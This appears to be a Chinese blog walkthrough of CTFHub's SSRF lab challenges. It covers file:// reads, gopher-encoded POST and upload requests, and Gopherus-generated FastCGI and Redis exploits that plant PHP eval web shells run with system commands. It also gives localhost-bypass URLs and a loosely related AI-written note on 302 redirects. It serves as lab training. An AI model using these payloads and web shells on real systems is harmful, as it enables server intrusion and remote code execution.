CTFHub技能树 Web-SSRF系列通过全技巧(已完结)

1. 内网访问

url后面输入http:// 127.0.0.1/flag.php,得到Flag

2. 伪协议读取文件

url后面输入file:///var/www/html/flag.php,然后右击页面查看页面源代码,得到Flag

3. 端口扫描

第一步:在url后面输入http://127.0.0.1:5000,对本页面抓包,右击抓包界面,发送到Intruder

第二步:点击Intruder,添加扫描位置

第三步:配置以下参数,开始攻击

第四步:点击长度》排序,找到和其他长度不一样的一条,点击美化找到Flag

4. POST请求

第一步:在url后加入http:127.0.0.1:80/flag.php访问,右击页面发现key,将key复制到输入框,回车访问

第二步:打开Burp Suite抓包,修改抓到的包

第三步:用在线工具进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码

第四步:在url后加入gopher://127.0.0.1:80/_后面再跟上最后编码得到内容,访问得到flag

5. 上传文件

第一步:打开链接在url后面输入http://127.0.0.1:80/flag.php访问,右击页面》检查,选中如图input标签》右击》编辑HTML,添加<input type="sumbit" name="sumbit">,因为本页面没有提交按钮所以我们手动创建一个

第二步:选择一个文件上传,点击提交查询并用Burp Suite抓包,修改包内容,右击发送到Reperter,打开重放器,发现有中文乱码,修改中文乱码为“提交“,点击发送,发现Content-Length:的长度改变

第三步:用在线工具对修改后包进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码

第四步:在url后加入gopher://127.0.0.1:80/_后面再跟上最后编码得到内容,访问得到flag

6. FastCGI协议

第一步:打开kali,下载好工具Gopherus-master,在文件夹里打开终端

第二步:依次输入以下命令

python2 gopherus.py --exploit fastcgi

/var/www/html/index.php

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

生成写入木马的响应包,复制响应的内容

第三步:对上面响应的内容用在线URL工具编码

第四步:给目标网站写入木马,将编码好的内容复制到url后面并访问,发现有响应内容我们进行下一步

第五步:在网站后输入shell.php,去访问shell.php,没有响应错误说明木马植入成功

第六步:打开中国菜刀右击界面添加url链接,将上一步的访问的url复制到此处,添加参数cmd,双击运行

第七步:找到/flag文件打开,找到本题的flag

7. Redis协议

第一步:打开kali,下载好工具Gopherus-master,在文件夹里打开终端

第二步:依次输入以下命令

python2 gopherus.py --exploit redis

/var/www/html

PHPShell

<?php @eval($_GET['cmd']); ?>

生成写入木马的响应包,复制响应的内容

第三步:对上面响应的内容用在线URL工具编码

第四步:给目标网站写入木马,将编码好的内容复制到url后面并访问

第五步:在网站后输入shell.php,去访问shell.php,如果有响应的内容说明木马植入成功

第六步:在url上输入/shell.php?cmd=system(‘ls /’);找到flag的文件

第七步:在url上输入/shell.php?cmd=system(‘cat /刚刚的flag文件名’);找到flag

8. URL Bypass

url后面输入http://notfound.ctfhub.com@127.0.0.1:80/flag.php,得到Flag

9. 数字IP Bypass

url后面输入http://localhost/flag.php,得到Flag

或者将127.0.0.1转换成16进制7F000001,url后面输入http://0x7F000001/flag.php,得到Flag

10. 302跳转 Bypass

url后面输入http://localhost/flag.php,得到Flag

11. DNS重绑定 Bypass

第一步:在解析网站上获取解析到内网IP的域名并作访问即可获取其Flag

附:网站地址rbndr.us dns rebinding service

第二步:在url后面输入http://7f000001.7f000002.rbndr.us/flag.php,得到Flag

  • 31
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHubWeb技能树中,302跳转是一种常见的技术。根据引用\[1\],302跳转继承了HTTP 1.0中302的实现,即无论原请求是GET还是POST,都可以自动进行重定向。而根据引用\[2\],在使用curl命令进行下载时,可以通过参数-C -实现断点续传,即在下载过程中按Ctrl + C停止下载,下次可以接着上次的进度继续下载。这样可以节省时间,避免重复下载已经下载过的部分。 在某些情况下,302跳转可能会受到黑名单的限制。根据引用\[3\],黑名单可能限制了特定的网段,如127、172、10、192网段。然而,可以通过使用localhost的方式绕过这些限制。例如,将http://127.0.0.1/flag.php转换为短网址,并构造Payload发送请求,利用302跳转可以获取到flag。 总结来说,302跳转是一种常见的Web技术,可以用于重定向请求。在CTFHubWeb技能树中,了解如何使用302跳转以及如何绕过黑名单限制是很重要的。 #### 引用[.reference_title] - *1* *2* [2.CTFhub技能树 web前置技能 http协议 302跳转](https://blog.csdn.net/FFFFFFMVPhat/article/details/121342556)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树 Web-SSRF 302跳转 Bypass](https://blog.csdn.net/weixin_44037296/article/details/118482943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值